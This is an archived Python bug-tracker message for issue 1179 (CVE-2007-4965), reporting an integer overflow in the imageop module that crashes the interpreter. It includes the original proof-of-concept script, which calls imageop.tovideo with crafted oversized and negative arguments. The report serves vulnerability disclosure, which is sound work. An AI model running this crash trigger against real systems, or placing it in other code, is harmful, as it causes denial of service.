[issue1179] [CVE-2007-4965] Integer overflow in imageop module

Ismail Donmez Tue, 18 Sep 2007 18:07:09 -0700

New submission from Ismail Donmez:

As reported at
http://lists.grok.org.uk/pipermail/full-disclosure/2007-September/065826.html
. There is an integer overflow in imageop module which results in an
interpreter crash. Original proof of concept code is attached.


----------
components: Library (Lib)
files: poc.py
messages: 56020
nosy: cartman
severity: normal
status: open
title: [CVE-2007-4965] Integer overflow in imageop module
type: security
versions: Python 2.5

__________________________________
Tracker <[EMAIL PROTECTED]>
<http://bugs.python.org/issue1179>
__________________________________

#!/usr/bin/python

import imageop

sexshit = "a"*1603
evil = "p"*5241
connard = "s"*2000
supaire= "45"*65
print supaire
connard = "cool"
salope = "suceuse"
dtc = imageop.tovideo(sexshit,1,4461,-2147002257)
sexshit = "dtc"*52
print connard,supaire," fin de dump"

_______________________________________________
Python-bugs-list mailing list 
Unsubscribe: 
http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue1179] [CVE-2007-4965] Integer overflow in imageop module

Reply via email to